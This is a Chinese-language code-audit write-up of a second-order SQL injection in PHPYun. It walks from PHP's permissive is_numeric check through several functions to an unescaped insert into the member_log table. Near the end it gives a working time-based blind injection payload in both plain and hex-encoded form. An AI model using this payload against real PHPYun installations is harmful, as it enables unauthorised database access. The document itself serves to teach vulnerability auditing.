二次注入 php,危险的is_numeric——PHPYun 2015-06-26 二次注入漏洞分析

今天分析是PHPYun的一个二次注入漏洞(漏洞详情)。

0x00 知识前提

PHP提供了is_numeric函数，用来变量判断是否为数字。但是函数的范围比较广泛，不仅仅是十进制的数字。

echo is_numeric(233333); # 1

echo is_numeric('233333'); # 1

echo is_numeric(0x233333); # 1

echo is_numeric('0x233333'); # 1

echo is_numeric('233333abc'); # 0

?>

MySQL数据库同样支持16进制，也就是HEX编码。虽然不像is_numeric函数一样有着比较强的容错性，但还是能够完成如下操作。

> insert into test (id, value) values (1, 0x74657374);

> select * from test;

| id | value |

| 1 | test |

以上两点单独看起来都没什么问题，但如果遇到合适的场景，比如程序猿只是用is_numeric函数验证变量是否为数字，就很有可能插入一些特殊字符到数据库中。虽然不能造成直接的SQL注入，但危险的数据已经悄悄潜伏在了路边，就等你经过。

0x10 寻找可利用的is_numeric

我们现在已经知道了is_numeric是个危险的函数，全局搜索的结果有很多，我们进一步筛选一下：

变量仅仅通过is_numeric判断是否为数字，没有经过Intval处理

变量插入/更新数据库的时候没有加引号(二次注入，需要先引入数据)

经过人肉筛选之后，我们得到了一个函数：

# /app/public/action.class.php

function FormatValues($Values){

$ValuesStr='';

foreach($Values as $k=>$v){

if(is_numeric($k)){

$ValuesStr.=','.$v;

}else{

if(is_numeric($v)){

$ValuesStr.=',`'.$k.'`='.$v;

}else{

$ValuesStr.=',`'.$k.'`=\''.$v.'\'';

}

}

}

return substr($ValuesStr,1);

}

这是个中间函数，我们搜一下哪里用到了这个函数。

QQ图片20150925113937.jpg

多个数据表模型都用到了这个函数，基本都是Update操作。现在的思路是利用接口将恶意代码Update进数据库，再通过其他接口，从数据库读恶意数据，在再次存到数据库的时候，进行注入。接下来的任务，是筛选能造成二次注入的点。

0x20 二次注入点

寻找二次注入的过程，是重复性的工作。根据全局搜索得出的多个模型，找到对应的控制层的代码，根据如下条件去筛选：

恶意代码insert/update到数据库

从数据库select数据，再将数据拼接到新的语句中(没有再次转义)

举个例子，ask.model.php中，出现了五次FormatValues。分别是：

UpdateAttention

UpdateQclass

UpdateAnswer

UpdateQuestion

SaveQuestion

搜索UpdateAttention：

QQ图片20151010202101.png

可以看到$type, 也就是写进attention表的type，是可用的。但是在数据库中查过之后，发现type的数据结构是int(11)，太短，放弃。

再继续查，UpdateQclass，没有实际用到。继续，UpdateAnswer：

Q7A%XXP}L}10VKCH4K76@21.png

验证后，也没有可用的。用这种方法，逐个去排除，直到：

$2[Y@UCJ09R]IWE}1XX(AAQ.png

跟进函数：

function saveinfo_action(){

if($_POST['submitBtn']){

$M=$this->MODEL('friend');

unset($_POST['submitBtn']);

$nid=$M->SaveFriendInfo($_POST,array("uid"=>$this->uid));

if($nid){

$state_content = "我刚修改了个性签名
[".$_POST['description']."]。";

$this->addstate($state_content);

$M->member_log("修改朋友圈基本信息");

$this->ACT_layer_msg("更新成功！",9,$_SERVER['HTTP_REFERER']);

}else{

$this->ACT_layer_msg("更新失败！",8,$_SERVER['HTTP_REFERER']);

}

}

}

再看一下friend_info表(从SaveFriendInfo()可以得到表名)，nickname、description的数据结构都是varchar(100)。

终于找到了恶意代码插入点，接下来看看能不能利用。从DB层(friend.model.php)可以找到GetFriendInfo():

function GetFriendInfo($Where=array(),$Options=array()){

$WhereStr=$this->FormatWhere($Where);

$FormatOptions=$this->FormatOptions($Options);

$row=$this->DB_select_once('friend_info',$WhereStr,$FormatOptions['field']);

if($row['pic']==''){

$row['pic']=$row['pic_big']=$this->config['sy_weburl'].'/'.$this->config['sy_friend_icon'];

}else{

$row['pic'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic']);

$row['pic_big'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic_big']);

}

return $row;

}

从数据库读出来的数据，处理了一下pic参数，就返回了。搜索一下哪里用到了这个函数：

Paste_Image.png

逐个排除，定位到函数：

Paste_Image.png

跟进member_log函数：

function member_log($content,$opera='',$type=''){

if($_COOKIE['uid']){

$value="`uid`='".(int)$_COOKIE['uid']."',";

$value.="`usertype`='".(int)$_COOKIE['usertype']."',";

$value.="`content`='".$content."',";

$value.="`opera`='".$opera."',";

$value.="`type`='".$type."',";

$value.="`ip`='".fun_ip_get()."',";

$value.="`ctime`='".time()."'";

$this->DB_insert_once("member_log",$value);

}

}

跟进DB_insert_once函数：

function DB_insert_once($tablename, $value){

$SQL = "INSERT INTO `" . $this->def . $tablename . "` SET ".$value;

$this->db->query("set sql_mode=''");

$this->db->query($SQL);

$nid= $this->db->insert_id();

return $nid;

}

成功找到注入点。

0x20 利用

AE49DB213E9045058ADCB1C68EE729DE.png

INSERT INTO `phpyun_atn` SET `uid`='2',`sc_uid`='1',`usertype`='1',`sc_usertype`='1',`time`='1444726415'

INSERT INTO `phpyun_friend_state` SET `uid`='2',`content`='关注了\'\"',`type`='2',`ctime`='1444726415'

INSERT INTO `phpyun_sysmsg` SET `fa_uid`='1',`content`='用户 bb2 关注了你！',`username`='bb1',`ctime`='1444726415'

INSERT INTO `phpyun_member_log` SET `uid`='2',`usertype`='1',`content`='关注了'"',`opera`='',`type`='',`ip`='127.0.0.1',`ctime`='1444726415'

1

第四条SQL语句成功注入。

构造payload

构造一个基于时间的盲注：

',ip=(select if(mid(user(),1,1)='r',sleep(5),0))#

0x20272c69703d2873656c656374206966286d6964287573657228292c312c31293d2772272c736c6565702835292c30292923

成功延时注入：

Paste_Image.png

0x30 总结

代码审计，有很多重复性的工作。拼的就是耐心和经验。这篇文章，算是手把手教如何审计二次注入漏洞了。之后会更多的关注PHP函数使用不当导致的漏洞，敬请期待。